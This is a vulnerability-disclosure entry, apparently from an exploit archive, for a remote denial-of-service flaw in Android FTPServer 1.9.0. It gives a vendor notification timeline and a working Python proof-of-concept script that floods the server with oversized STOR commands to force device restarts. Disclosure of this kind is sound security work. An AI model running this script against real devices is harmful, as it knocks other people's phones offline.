Android FTPServer 1.9.0 Denial Of Service

2012.03.21

Credit: G13

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: Android FTPServer 1.9.0 Remote DoS
# Date: 03/20/12
# Author: G13
# Twitter: @g13net
# Software Site: https://sites.google.com/site/andreasliebigapps/ftpserver/
# Download Link: http://www.g13net.com/ftpserver.apk
# Version: 1.9.0
# Category: DoS (android)
#

##### Vulnerability #####

FTPServer is vulnerable to a DoS condition when long file names are
repeatedly attempted to be written via the STOR command.

Successful exploitation will causes devices to restart.

Android Security Team has confirmed this issue.

I have been able to test this exploit against Android 2.2 and 2.3.
4.0 (ICS) appears not to be vulnerable.

##### Vendor Timeline #####

Android Security Team:
10/20/11 - Vendor Notified of vulnerability, Vendor notifies me they will
be looking into the issue
10/21/11 - vendor Requests bug report from device, bug report sent, PoC
Code Delivered to Vendor
10/24/11 - Asked Vendor Status, stated I have been able to duplicate issue
on multiple devices
10/25/11 - Vendor states they are still working on it
10/30/11 - Current Status asked
10/31/11 - vendor Replies no updates
11/7/11 - Emailed Vendor, they ask for more clarification on issue. I
submit more details
11/8/11 - Vendor acknowledges that it is not the APK itself causing the
crashes.  Vendor also confirms full reboots from PoC code.
11/9/11 - Vendor asks if I am just crashing application or device in
certain instances.  I state device is restarting.
11/11/11 - I ask if there is anything more I may assist with.  Vendor
states they have isolated the impacted component and are working on a
fix.
11/18/11 - Current status Asked.
12/8/11 - Update requested, response that they will contact Kernel team for
an update
01/13/12 - Current status asked, no response
03/06/12 - Current status asked, no response
03/20/12 - Disclosure

Developer:
1/24/12 - Developer contacted
1/25/12 - Developer Responds
1/27/12 - Supplied Developer with PoC code, Developer confirms issue
1/29/12 - Developer releases new version
3/20/12 - Disclosure

##### PoC #####

#!/usr/bin/python
# Android FTPServer PoC Device Crash

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

buffer = "STOR " + "A" * 5000 + "\r\n"
for x in xrange(1,31):
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 print x
 s.connect(('172.16.30.108',2121))

 data=s.recv(1024)
 s.send("USER test\r\n")
 data=s.recv(1024)
 s.send("PASS test\r\n")

 s.send(buffer)

 s.send("QUIT")

 s.close()

References:

https://sites.google.com/site/andreasliebigapps/ftpserver/

http://www.g13net.com/ftpserver.apk

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Android FTPServer 1.9.0 Denial Of Service

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.